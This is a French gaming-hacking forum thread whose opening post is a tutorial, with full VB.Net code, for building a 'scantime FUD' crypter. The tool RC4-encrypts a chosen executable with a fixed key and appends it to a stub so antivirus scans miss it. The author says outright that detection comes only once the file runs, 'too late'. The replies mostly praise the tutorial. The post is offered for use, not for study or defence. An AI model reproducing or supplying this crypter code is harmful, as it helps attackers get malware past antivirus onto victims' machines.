• Ce site utilise des cookies. En continuant à utiliser ce site, vous acceptez l'utilisation des cookies. En savoir plus.
Forum de libres discussions autour du jeux vidéo (cheats, glitches, hacks, modding, réalité virtuelle VR, cryptomonnaies) - YOUPASS - convertir le crédit téléphonique en monnaie ! : Partenaire RealityGaming.fr - RealityGaming

♔ AstuceRG 2ème édition : création d'un crypter presque 100% FUD en VB.Net ! ♔

Statut
N'est pas ouverte pour d'autres réponses.

GreeSey © 2015

• Développeur VB.net / HTML •
Premium
Inscrit
9 Mai 2012
J'aime
406
Reply from GreeSey © 2015 Forums généraux Discussions générales : ♔ AstuceRG 2ème édition : création d'un crypter presque 100% FUD en VB.Net ! ♔ #1
Salut à tous, c'est GreeSey ! Forum de libres discussions autour du jeux vidéo (cheats, glitches, hacks, modding, réalité virtuelle VR, cryptomonnaies) - :D - RealityGaming

Suite a la présentation du nouveau projet accessible
Vous devez vous inscrire pour voir les liens !
, je vais vous présentez la deuxième édition de AstuceRG !

Je vais vous présentez comment créer un crypter scantime presque 100% FUD codé en Visual Basic.

Lien de téléchargement de Microsoft Visual Basic :
!

Qu'es-ce-que veux dire Crypter scantime 100% FUD ?

Cela veux dire que pendant que l’exécutable (le programme choisi) est sur le bureau, l'anti-virus ne trouvera rien de frauduleux (l'anti-virus est entrain d’analysé le programme) . Si on exécute l’exécutable, l'anti-virus va détecter que le logiciel est frauduleux, mais il sera déjà trop tard !

Bref passons à l'astuce de la semaine !Forum de libres discussions autour du jeux vidéo (cheats, glitches, hacks, modding, réalité virtuelle VR, cryptomonnaies) - :bave: - RealityGaming

Alors tout d'abord, cliquer sur "Nouveau projet".
Forum de libres discussions autour du jeux vidéo (cheats, glitches, hacks, modding, réalité virtuelle VR, cryptomonnaies) -  - RealityGaming

Puis une fenêtre apparaît et renommer-le en ce que vous voulez et si possible sans espace, puis "OK".

Pour ce crypter il faudra :
- 3 Boutons.
- 1 TextBox.

Placez les comme vous voulez !

Forum de libres discussions autour du jeux vidéo (cheats, glitches, hacks, modding, réalité virtuelle VR, cryptomonnaies) -  - RealityGaming

M
aintenant la partie design est fini, on passe au codage ! Forum de libres discussions autour du jeux vidéo (cheats, glitches, hacks, modding, réalité virtuelle VR, cryptomonnaies) - :dance: - RealityGaming
Juste avant, copier/coller ce que je vous donne, cela sera plus rapide pour vous !

V
ous commencez par marquer cela en haut :
Code:
Imports System.Text

Public Class Form1
    Const filesplit = "123456789"

D
ouble clique sur "Ouvrir .exe" et copier/coller le code suivant :
Code:
Private Sub Button1_Click(sender As System.Object, e As System.EventArgs) Handles Button1.Click
        Dim x As New OpenFileDialog
        x.Filter = "Exécutables |*.exe"
        x.InitialDirectory = "/VotreDossier"
        x.Multiselect = False
        Button1.Enabled = True
        If x.ShowDialog = Windows.Forms.DialogResult.OK Then
            TextBox1.Text = x.FileName
        Else
            MsgBox("Vous n'avez pas ouvert de fichier !")
            Button1.Enabled = False
            TextBox1.Text = "aucun fichier !"
        End If
    End Sub

Double clique sur "Crypter" et copier/coller le code suivant :
Code:
Private Sub Button2_Click(sender As System.Object, e As System.EventArgs) Handles Button2.Click
        Dim filein, filename, stub As String
        Dim sfd As New SaveFileDialog
        sfd.Filter = "Exécutables |*.exe "
        If sfd.ShowDialog = Windows.Forms.DialogResult.OK Then
            filename = sfd.FileName
        Else : Exit Sub
        End If
        FileOpen(1, TextBox1.Text, OpenMode.Binary, OpenAccess.Read,
        OpenShare.Default)
        filein = Space(LOF(1))
        FileGet(1, filein)
        FileClose(1)
        FileOpen(1, Application.StartupPath & "\Stub.exe", OpenMode.Binary,
        OpenAccess.Read, OpenShare.Default)
        stub = Space(LOF(1))
        FileGet(1, stub)
        FileClose(1)
        FileOpen(1, filename, OpenMode.Binary, OpenAccess.ReadWrite,
        OpenShare.Default)
        FilePut(1, stub & filesplit & RC4(filein, "123456789"))
        FileClose(1)
        MsgBox("Le fichier est crypté ! ")
    End Sub

Double clique sur "Quitter" et copier/coller le code suivant :
Code:
Private Sub Button3_Click(sender As System.Object, e As System.EventArgs) Handles Button3.Click

End

End Sub
End Class

Puis a la suite de tout le codage vous copier/coller la fonction RC4 :
Code:
Public Function RC4(ByVal message As String, ByVal password As String) As String
        Dim i As Integer = 0
        Dim j As Integer = 0
        Dim cipher As New StringBuilder
        Dim returnCipher As String = String.Empty
        Dim sbox As Integer() = New Integer(256) {}
        Dim key As Integer() = New Integer(256) {}
        Dim intLength As Integer = password.Length
        Dim a As Integer = 0
        While a <= 255
            Dim ctmp As Char = (password.Substring((a Mod intLength),
            1).ToCharArray()(0))
            key(a) = Microsoft.VisualBasic.Strings.Asc(ctmp)
            sbox(a) = a
            System.Math.Max(System.Threading.Interlocked.Increment(a), a - 1)
        End While
        Dim x As Integer = 0
        Dim b As Integer = 0
        While b <= 255
            x = (x + sbox(b) + key(b)) Mod 256
            Dim tempSwap As Integer = sbox(b)
            sbox(b) = sbox(x)
            sbox(x) = tempSwap
            System.Math.Max(System.Threading.Interlocked.Increment(b), b - 1)
        End While
        a = 1
        While a <= message.Length
            Dim itmp As Integer = 0
            i = (i + 1) Mod 256
            j = (j + sbox(i)) Mod 256
            itmp = sbox(i)
            sbox(i) = sbox(j)
            sbox(j) = itmp
            Dim k As Integer = sbox((sbox(i) + sbox(j)) Mod 256)
            Dim ctmp As Char = message.Substring(a - 1, 1).ToCharArray()(0)
            itmp = Asc(ctmp)
            Dim cipherby As Integer = itmp Xor k
            cipher.Append(Chr(cipherby))
            System.Math.Max(System.Threading.Interlocked.Increment(a), a - 1)
        End While
        returnCipher = cipher.ToString
        cipher.Length = 0
        Return returnCipher
    End Function

Puis pour que votre crypter soit en ".exe" sur votre bureau, il faut aller dans Projet > Publier "Nom de votre application"

Parcourir : mettez le logiciel sur votre bureau/destock > Cliquez sur "Ouvrir" > Puis enfin sur "Terminer".
Une page "Explorateur Windows" va s'ouvrir, vous pouvez la fermer !

Après tout cela vous aurez 3 nouvelles icônes sur votre bureau :

V
ous pouvez supprimer cela :

Ouvrez le dossier "Application Files" et vous aurez 3 fichiers, dont un avec : "Lenomdevotreappli.exe.deploy",
supprimer donc le ".deploy" et voila votre Application en ".exe" est créer !

Pour changer d'icone, je vous donne le lien de téléchargement de mon Icone changer, avec un lien virus total pour vous certifiez que le logiciel est clean ! Forum de libres discussions autour du jeux vidéo (cheats, glitches, hacks, modding, réalité virtuelle VR, cryptomonnaies) - :) - RealityGaming

Télécharger l'icone changer (lien MEGA) :
!

Lien virus total :
!

Voila, ce tutoriel ce termine ainsi, penser a mettre a petit "J'aime" pour le travail ! Forum de libres discussions autour du jeux vidéo (cheats, glitches, hacks, modding, réalité virtuelle VR, cryptomonnaies) - :D - RealityGaming

Voici la première édition :
!

Je vous retrouve plus tard pour une nouvelle astuce de la semaine !

A bientôt !

GreeSey Forum de libres discussions autour du jeux vidéo (cheats, glitches, hacks, modding, réalité virtuelle VR, cryptomonnaies) - :D - RealityGaming Forum de libres discussions autour du jeux vidéo (cheats, glitches, hacks, modding, réalité virtuelle VR, cryptomonnaies) - :tchuss: - RealityGaming

Dernière édition:

Rivals

Animateur informatique
Premium
Inscrit
27 Août 2016
J'aime
289
Reply from Rivals Forums généraux Discussions générales : ♔ AstuceRG 2ème édition : création d'un crypter presque 100% FUD en VB.Net ! ♔ #2
Super tutoriel , très bien détaillé.

Tu mérites la récompense selon moi. Forum de libres discussions autour du jeux vidéo (cheats, glitches, hacks, modding, réalité virtuelle VR, cryptomonnaies) - ;) - RealityGaming

M

membre150711

Invité
Reply from membre150711 Forums généraux Discussions générales : ♔ AstuceRG 2ème édition : création d'un crypter presque 100% FUD en VB.Net ! ♔ #3
Super tu to je vais essayer de le reproduire et je te ferait un petit screen Forum de libres discussions autour du jeux vidéo (cheats, glitches, hacks, modding, réalité virtuelle VR, cryptomonnaies) - :) - RealityGaming

GreeSey © 2015

Premium
Inscrit
9 Mai 2012
J'aime
406
Reply from GreeSey © 2015 Forums généraux Discussions générales : ♔ AstuceRG 2ème édition : création d'un crypter presque 100% FUD en VB.Net ! ♔ #4
Inscrit
24 Novembre 2011
J'aime
418
Reply from TWD | SMru Forums généraux Discussions générales : ♔ AstuceRG 2ème édition : création d'un crypter presque 100% FUD en VB.Net ! ♔ #5
J'aimerai bien apprendre a coder en VB, tu donnes des cours ?

Raidenz

Premium
Premium
Inscrit
25 Février 2012
J'aime
804
Reply from Raidenz Forums généraux Discussions générales : ♔ AstuceRG 2ème édition : création d'un crypter presque 100% FUD en VB.Net ! ♔ #6
Super je vais personnalisé.

Magz'

Vétéran
Ancien staff
Inscrit
29 Août 2012
J'aime
6 787
Reply from Magz' Forums généraux Discussions générales : ♔ AstuceRG 2ème édition : création d'un crypter presque 100% FUD en VB.Net ! ♔ #7
Bon tuto, merci Forum de libres discussions autour du jeux vidéo (cheats, glitches, hacks, modding, réalité virtuelle VR, cryptomonnaies) - :ok: - RealityGaming

GreeSey © 2015

Premium
Inscrit
9 Mai 2012
J'aime
406
Reply from GreeSey © 2015 Forums généraux Discussions générales : ♔ AstuceRG 2ème édition : création d'un crypter presque 100% FUD en VB.Net ! ♔ #9
J'aimerai bien apprendre a coder en VB, tu donnes des cours ?
Je ne pence pas avoir le niveau pour te donner des cours, mais je peux t'aider si un jour ça te prends de créer une application, je pourrai t'aider si tu veux ! Forum de libres discussions autour du jeux vidéo (cheats, glitches, hacks, modding, réalité virtuelle VR, cryptomonnaies) - :D - RealityGaming

Statut
N'est pas ouverte pour d'autres réponses.